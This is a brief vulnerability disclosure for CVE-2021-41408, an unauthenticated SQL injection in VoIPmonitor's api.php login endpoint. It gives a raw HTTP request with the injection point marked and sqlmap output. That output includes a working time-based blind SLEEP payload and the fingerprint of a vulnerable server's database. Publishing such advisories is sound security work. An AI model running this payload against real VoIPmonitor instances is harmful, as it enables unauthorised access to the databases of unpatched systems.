CVE-2021-41408: voipmonitor unauth sql injection

sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.

GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1 Host: vulnerableinstance User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 0 Connection: close

sqlmap result:

Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=’ AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj’=’jvDj&pass=trollz — [02:19:33] [INFO] testing MySQL [02:20:22] [INFO] confirming MySQL web application technology: Nginx 1.14.2, PHP back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) banner: ‘10.3.29-MariaDB-1:10.3.29+maria~stretch’

cc: @cnbrkbolat & @R0h1rr1m